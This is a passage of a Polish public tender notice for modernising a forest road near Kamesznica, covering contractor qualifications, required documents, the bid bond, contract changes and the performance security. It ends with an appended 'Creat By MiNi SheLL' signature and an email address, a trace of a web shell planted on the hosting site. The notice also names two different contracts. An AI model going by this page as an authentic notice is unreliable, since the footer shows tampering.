lub finansowej, jeżeli wykaże:<br/><br/>a)	posiadanie środków finansowych lub zdolności kredytowej w wysokości co najmniej <br/>500.000,00 zł.<br/><br/>4) Zdolności technicznej lub zawodowej:<br/><br/>4.1) Warunek ten, w zakresie doświadczenia, zostanie uznany, jeżeli Wykonawca wykaże, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, zrealizował co najmniej 2 (dwie) odrębne roboty budowlane obejmujące wykonanie nawierzchni dróg wraz z robotami odwodnieniowymi o wartości min: 500000,00 zł<br/><br/>-W przypadku robót, których wartość została wyrażona w umowie, w innej walucie niż PLN należy dokonać przeliczenia tej waluty na PLN, przy zastosowaniu średniego kursu NBP na dzień opublikowania ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych (w przypadku robót rozliczanych wyłącznie w walutach innych niż PLN).<br/><br/>4.2). Warunek ten, w zakresie osób skierowanych przez Wykonawcę do realizacji zamówienia, zostanie uznany, jeżeli Wykonawca wykaże, że dysponuje : <br/>Co najmniej 1(jedną) osobą posiadającą uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie w zakresie kierowania robotami budowlanymi w specjalności inżynieryjnej-drogowej lub równoważnej bez ograniczeń niezbędnymi do wykonania zamówienia zgodnie z ustawą z dnia 07.07.1994 Prawo budowlane (t.j. Dz.U. z 2020 r. poz. 1333 ze zm.) lub odpowiadające im równoważne uprawnienia w tej specjalności, które zostały wydane na podstawie wcześniej obowiązujących przepisów. Zamawiający dopuszcza uprawnienia wydane obywatelom Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, zgodnie z ustawą o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej.<br/><br/>Kierownik budowy/kierownicy robót powinni posiadać uprawnienia budowlane zgodnie z ustawą <br/>z dnia 7 lipca 1994 r. Prawo budowlane oraz rozporządzeniem Ministra Inwestycji i Rozwoju z dnia <br/>29 kwietnia 2019r. w sprawie przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych w budownictwie lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Wykaz dokumentów i<br/>oświadczeń, które Wykonawca składa w postępowaniu na wezwanie Zamawiającego w celu potwierdzenia braku podstaw<br/>wykluczenia:<br/>a) odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji<br/>o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt. 4 ustawy Pzp, sporządzona nie wcześniej niż 3 miesiące przed jej<br/>złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji,<br/>b) oświadczenie Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa<br/>w art. 125 ust. 1 ustawy Pzp, w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego, o których mowa<br/>w art. 108 ust. 1 ustawy Pzp – wzór oświadczenia stanowi załącznik nr 5 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Podmiotowe środki dowodowe – składane na wezwanie Zamawiającego.<br/>Zamawiający wezwie Wykonawcę, którego oferta zostanie najwyżej oceniona, do złożenia<br/>w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, aktualnych na dzień złożenia podmiotowych środków<br/>dowodowych.<br/>1) Wykaz dokumentów i oświadczeń, które Wykonawca składa w postępowaniu na wezwanie Zamawiającego w celu potwierdzenia<br/>spełniania warunków udziału w postępowaniu:<br/>a) informacja banku lub spółdzielczej kasy oszczędnościowo-kredytowej, potwierdzająca wysokość posiadanych środków<br/>finansowych lub zdolność kredytową Wykonawcy, w okresie nie wcześniejszym niż 3 miesiące przed jej złożeniem,<br/>b) wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli<br/>okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania oraz<br/>podmiotów, na rzecz których roboty te zostały wykonane – wzór wykazu stanowi załącznik nr 6 do SWZ, oraz załączeniem dowodów<br/>określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne<br/>dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli Wykonawca z przyczyn<br/>niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty,<br/>(Uwaga: jeżeli Wykonawca powołuje się doświadczenie w realizacji robót budowlanych wykonywanych wspólnie z innymi<br/>Wykonawcami wykaz powinien dotyczyć robót budowlanych,<br/>w których wykonaniu Wykonawca ten bezpośrednio uczestniczył),<br/>c) wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego,<br/>w szczególności odpowiedzialnych za kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych,<br/>uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych<br/>przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami – wzór wykazu stanowi załącznik nr 7 do SWZ.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 3. Wykonawca, którego oferta zostanie wybrana jako najkorzystniejsza, przed podpisaniem umowy zobowiązany jest do:<br/>1) przedłożenia umowy regulującej zasady współpracy Wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/>(jeśli dotyczy),<br/>2) przedłożenia dokumentów dotyczących osób wskazanych w ofercie na stanowisko Kierownika budowy/Kierowników<br/>robót:<br/>- potwierdzających posiadanie uprawnień budowlanych do kierowania robotami w wymaganych specjalnościach oraz<br/>przynależność do właściwej Okręgowej Izby Inżynierów Budownictwa lub inne równoważne dokumenty,<br/>3) wniesienia wymaganego zabezpieczenia należytego wykonania umowy,<br/>4. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ponoszą solidarną odpowiedzialność za wykonanie umowy<br/>i wniesienie zabezpieczenia należytego wykonania umowy.<br/>5. Zamawiający zawiera umowę w sprawie zamówienia publicznego, z uwzględnieniem art. 577<br/>ustawy Pzp, w terminie nie krótszym niż 5 dni od dnia przesłania zawiadomienia o wyborze najkorzystniejszej oferty, jeżeli<br/>zawiadomienie to zostało przesłane przy użyciu środków komunikacji elektronicznej.<br/>6. Zamawiający może zawrzeć umowę przed upływem terminu, o którym mowa w pkt. 5, jeżeli<br/>w postępowaniu złożono tylko jedną ofertę.<br/>7. Jeżeli Wykonawca, którego oferta została wybrana jako najkorzystniejsza, uchyla się od zawarcia umowy w sprawie<br/>zamówienia publicznego lub nie wnosi wymaganego zabezpieczenia należytego wykonania umowy, Zamawiający może<br/>dokonać ponownego badania i oceny ofert spośród ofert pozostałych w postępowaniu Wykonawców oraz wybrać<br/>najkorzystniejszą ofertę albo unieważnić postępowanie. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. W niniejszym postępowaniu Zamawiający żąda wniesienia wadium.<br/>Wykonawca zobowiązany jest przed upływem terminu składania ofert do wniesienia wadium <br/>w wysokości: 7000 zł.<br/><br/>2. Wadium może być wniesione w jednej lub kilku następujących formach:<br/>1) pieniądzu wpłaconym przelewem na rachunek bankowy Zamawiającego w BANKU SPÓŁDZIELCZYM WĘGIERSKA GÓRKA nr 33 8131 0005 0000 1094 2000 0010 z dopiskiem: wadium na zabezpieczenie oferty w postępowaniu na „Przebudowa- modernizacja drogi leśnej Na Piaski w leśnictwie Kamesznica”<br/>2) gwarancjach bankowych,<br/>3) gwarancjach ubezpieczeniowych,<br/>4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia <br/> 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.<br/><br/>3. W przypadku wadium wnoszonego w formie gwarancji lub poręczenia, Wykonawca przekazuje Zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej. <br/> <br/>Gwarancja lub poręczenie powinny zawierać następujące elementy:<br/>a) zobowiązanie gwaranta do zapłacenia kwoty gwarancji/poręczenia bezwarunkowo na pierwsze pisemne żądanie Zamawiającego, w sytuacjach określonych w art. 98 ust. 6 ustawy Pzp,<br/>b) z jej treści powinno jednoznacznie wynikać zobowiązanie gwaranta do zapłaty całej kwoty wadium;<br/>c) powinno być nieodwołalne i bezwarunkowe,<br/>d) termin obowiązywania poręczenia lub gwarancji nie może być krótszy niż termin związania ofertą <br/>(z zastrzeżeniem, iż pierwszym dniem związania ofertą jest dzień składania ofert),<br/>e) w treści poręczenia lub gwarancji powinna znaleźć się nazwa oraz numer przedmiotowego postępowania,<br/>f) nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji (Zamawiającego), gwaranta/ poręczyciela oraz wskazanie ich siedzib; Beneficjentem wskazanym w gwarancji lub poręczeniu musi być Zamawiajacy,<br/>g) określenie wierzytelności, która ma być zabezpieczona gwarancją/poręczeniem,<br/>h) kwotę gwarancji/poręczenia.<br/><br/>4. Wniesienie wadium w pieniądzu za pomocą przelewu bankowego Zamawiający będzie uważał za skuteczne wówczas, gdy przed upływem terminu składania ofert rachunek bankowy Zamawiającego zostanie uznany kwotą wadium. W wymienionym przypadku Wykonawca winien załączyć do oferty kopię polecenia przelewu.<br/><br/>5. Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym. <br/><br/>6. Wadium utrzymuje się nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w pkt. 7 ppkt. 2) i 3) oraz pkt. 8.<br/><br/>7. Zamawiający zwraca wadium niezwłocznie, nie później jednak niż w terminie 7 dni od dnia wystąpienia jednej z okoliczności:<br/>1) upływu terminu związania ofertą,<br/>2) zawarcia umowy w sprawie zamówienia publicznego,<br/>3) unieważnienia postępowania o udzielenie zamówienia, z wyjątkiem sytuacji gdy nie zostało rozstrzygnięte odwołanie na czynność unieważnienia albo nie upłynął termin do jego wniesienia. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 4) W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia każdy<br/>z Wykonawców składających ofertę wspólną, składa dokumenty o których mowa w pkt. 2 ppkt. 2) niniejszego rozdziału oraz<br/>dokumenty, o których mowa w pkt. 2 ppkt. 1) niniejszego rozdziału<br/>w zakresie, w którym każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>5) Jeżeli Wykonawca polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby na zasadach określonych w<br/>art. 118 ustawy Pzp, Zamawiający żąda od Wykonawcy przedstawienia dokumentów dotyczących tych podmiotów, o których<br/>mowa w pkt. 2 ppkt. 2) niniejszego rozdziału oraz dokumentów, o których mowa w pkt. 2 ppkt. 1) niniejszego rozdziału w<br/>zakresie,<br/>w którym każdy z nich wykazuje spełnianie warunków udziału w postępowaniu.<br/>Do podmiotów udostępniających zasoby mających siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej<br/>Polskiej, przepis pkt. 2 ppkt. 3) stosuje się odpowiednio.<br/>6) Jeżeli zachodzą uzasadnione podstawy do uznania, że złożone uprzednio podmiotowe środki dowodowe nie są już<br/>aktualne, Zamawiający może w każdym czasie wezwać Wykonawcę lub Wykonawców do złożenia wszystkich lub<br/>niektórych podmiotowych środków dowodowych, aktualnych na dzień ich złożenia.<br/>7) Zamawiający nie wzywa do złożenia podmiotowych środków dowodowych, jeżeli może je uzyskać za pomocą<br/>bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów publicznych<br/>w rozumieniu ustawy z dnia 17 lutego 2005r. o informatyzacji działalności podmiotów realizujących zadania publiczne, o ile<br/>Wykonawca wskazał w oświadczeniu wstępnym, o którym mowa w pkt. 1 niniejszego rozdziału, dane umożliwiające dostęp<br/>do tych środków.<br/>8) Wykonawca nie jest zobowiązany do złożenia podmiotowych środków dowodowych, które Zamawiający posiada, jeżeli<br/>Wykonawca wskaże te środki oraz potwierdzi ich prawidłowość<br/>i aktualność.<br/>9) Wartości podane w dokumentach w walutach obcych zostaną przeliczone na PLN - wg średniego kursu PLN w stosunku<br/>do walut obcych ogłaszanego przez Narodowy Bank Polski (Tabela A kursów średnich walut obcych) na dzień, w którym<br/>ogłoszenie o zamówieniu zostało opublikowane<br/>w Biuletynie Zamówień Publicznych.<br/>10) Dokumenty sporządzone w języku obcym należy złożyć wraz z tłumaczeniem na język polski. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zmiana niniejszej umowy może nastąpić wyłącznie za obopólną zgodą stron, w formie pisemnej pod rygorem nieważności, z zastrzeżeniem ust. 2.<br/>2.	Zmiana umowy może nastąpić w następujących przypadkach:<br/>1)	opisanych w poprzedzających paragrafach umowy,<br/>2)	wskazanych w ustawie - Prawo zamówień publicznych,<br/>3)	w zakresie terminu wykonania umowy:<br/>a.	zawieszenia robót przez organy nadzoru budowlanego z przyczyn niezależnych od Wykonawcy – o ilość dni zawieszenia robot,<br/>b.	wystąpienia okoliczności, których strony umowy nie były w stanie przewidzieć pomimo zachowania należytej staranności a za które odpowiedzialności nie ponosi Wykonawca – o ilość dni nie wykonywania umowy z powodu wskazanych okoliczności,<br/>c.	konieczności zaspokojenia roszczeń lub oczekiwań osób trzecich, uniemożliwiających wykonanie prac, które to działania nie są konsekwencją winy którejkolwiek ze stron – o ilość dni nie wykonywania robót z powodu wskazanych okoliczności,<br/>d.	wystąpienia zdarzeń siły wyższej – nowy termin wykonania zamówienia ustali Zamawiający w porozumieniu z Wykonawcą uwzględniając zaistniałe okoliczności (tj. przez okoliczności nadzwyczajne, nieprzewidywalne bądź też niemożliwe do uniknięcia mimo możliwości ich przewidzenia, w szczególności: klęski żywiołowe, katastrofy, zamieszki, epidemie, embarga itp.), <br/>e.	konieczności usunięcia błędów lub wprowadzenia zmian w dokumentacji projektowej, na podstawie której realizowana jest umowa - o ilość dni niezbędną na dokonanie zmian w dokumentacji.<br/>4)	w przypadku opóźnień w realizacji przedmiotu zamówienia wynikających z konieczności wykonania nieprzewidzianych wcześniej robót budowlanych na terenie budowy, powstałych z przyczyn niezawinionych przez Wykonawcę, w szczególności w przypadku ujawnienia w trakcie robót urządzeń podziemnych elementów instalacji, konstrukcji, których istnienie lub lokalizacja były nieujawnione przy opracowywaniu dokumentacji projektowej - o okres tych opóźnień,<br/>5)	w razie konieczności wykonania zamówień dodatkowych niezbędnych do prawidłowego wykonania zamówienia podstawowego lub innych zamówień powiązanych, których udzielenie i wykonanie stało się konieczne lub celowe i które mają wpływ na termin realizacji niniejszego zamówienia,<br/>6)	w razie wystąpieniem niezależnych od Wykonawcy przyczyn technologicznych wpływającymi na realizację przedmiotu zamówienia i przyjęte rozwiązania technologiczne,<br/>7)	w razie wystąpienia okoliczności, których strony umowy nie były w stanie przewidzieć pomimo zachowania należytej staranności.<br/>3.	Strony zobowiązują się do wzajemnego informowania się o wszelkich okolicznościach mogących mieć wpływ na wykonanie niniejszej umowy oraz do dołożenia należytej staranności i działania według ich najlepszej wiedzy w celu wykonania niniejszej umowy <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-10-05 09:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć za pośrednictwem Formularza do złożenia, zmiany, wycofania oferty lub wniosku dostępnego na e-PUAP i udostępnionego na miniPortalu</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-10-05 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-11-04</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. W niniejszym postępowaniu Zamawiający żąda wniesienia zabezpieczenia należytego wykonania umowy w wysokości<br/>2,5% ceny oferty brutto.<br/>Zabezpieczenie może być wniesione w jednej lub kilku następujących formach:<br/>1) pieniądzu wpłaconym przelewem na rachunek bankowy Zamawiającego:<br/>na rachunek bankowy Zamawiającego w BANKU SPÓŁDZIELCZYM WĘGIERSKA GÓRKA<br/>nr 33 8131 0005 0000 1094 2000 0010<br/>z dopiskiem: „Zabezpieczenie dot. postępowania o udzielenie Zamówienia pn.„ Osadzanie wodospustów drewnianych<br/>drążonych na drogach leśnych.”<br/>2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo – kredytowej, z tym, że zobowiązanie<br/>kasy jest zawsze zobowiązaniem pieniężnym,<br/>3) gwarancjach bankowych,<br/>4) gwarancjach ubezpieczeniowych,<br/>5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia<br/>9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.<br/>2. Zabezpieczenie należytego wykonania umowy należy wnieść przed zawarciem umowy:<br/>a) w przypadku wnoszenia zabezpieczenia należytego wykonania umowy w pieniądzu – odpowiednią kwotę należy wpłacić<br/>przelewem na rachunek bankowy wskazany przez Zamawiającego przed podpisaniem umowy; umowa w sprawie<br/>zamówienia publicznego zostanie zawarta dopiero<br/>w momencie, gdy rachunek bankowy Zamawiającego zostanie uznany kwotą zabezpieczania,<br/>Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane<br/>b) w przypadku wnoszenia zabezpieczenia należytego wykonania umowy w formie gwarancji lub poręczenia, wymagana<br/>jest wcześniejsza akceptacja jej treści przez Zamawiającego.<br/>3. W przypadku wniesienia wadium w pieniądzu Wykonawca może wyrazić zgodę na zaliczenie kwoty wadium na poczet<br/>zabezpieczenia.<br/>4. Zabezpieczenie wniesione w pieniądzu Zamawiający przechowuje na oprocentowanym rachunku bankowym.<br/>Zamawiający zwróci zabezpieczenie wniesione w pieniądzu z odsetkami wynikającymi<br/>z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszt prowadzenia tego rachunku<br/>oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy Wykonawcy.<br/>5. Zamawiający ustala podział zabezpieczenia należytego wykonania umowy na dwie części:<br/>1) 70% wartości zabezpieczenia zostanie zwrócone Wykonawcy, w terminie 30 dni od dnia wykonania zamówienia i uznania<br/>przez Zamawiającego za należycie wykonane,<br/>2) 30% wartości zabezpieczenia pozostaje na zabezpieczenie roszczeń z tytułu gwarancji i rękojmi za wady oraz zwrócone<br/>będzie Wykonawcy nie później niż w 15. dniu po upływie okresu gwarancji<br/>i rękojmi za wady.<br/>6. W trakcie realizacji umowy Wykonawca może dokonać zmiany formy zabezpieczenia na jedną lub kilka form, o których<br/>mowa w pkt. 1. Zmiana formy zabezpieczenia jest dokonywana z zachowaniem ciągłości zabezpieczenia i bez zmniejszenia<br/>jego wysokości.<br/>7. W przypadku zmiany terminu wykonania przedmiotu umowy, Wykonawca zobowiązany jest zapewnić, aby<br/>zabezpieczenie należytego wykonania umowy obowiązywało w całym okresie wykonania umowy oraz w okresie gwarancji i<br/>rękojmi za wady.<br/>8. W przypadku nie uzyskania przez Wykonawcę zabezpieczenia należytego wykonania umowy<br/>w formie gwarancji lub poręczania na cały okres jego obowiązywania, Wykonawca wnosi zabezpieczenie na okres nie<br/>krótszy niż 5 lat, z jednoczesnym zobowiązaniem się Wykonawcy do przedłużenia zabezpieczenia lub wniesienia nowego<br/>zabezpieczenia na kolejne okresy.<br/>9. W przypadku nieprzedłużenia lub niewniesienia nowego zabezpieczenia najpóźniej na 30 dni przed upływem terminu<br/>ważności dotychczasowego zabezpieczenia wniesionego w formie gwarancji lub poręczania, Zamawiający zmieni formę na<br/>zabezpieczenie w pieniądzu, poprzez wypłatę kwoty<br/>z dotychczasowego zabezpieczenia.<br/>10. Wypłata, o której mowa w pkt. 9, nastąpi nie później niż w ostatnim dniu ważności dotychczasowego zabezpieczenia.

Creat By MiNi SheLL
Email: jattceo@gmail.com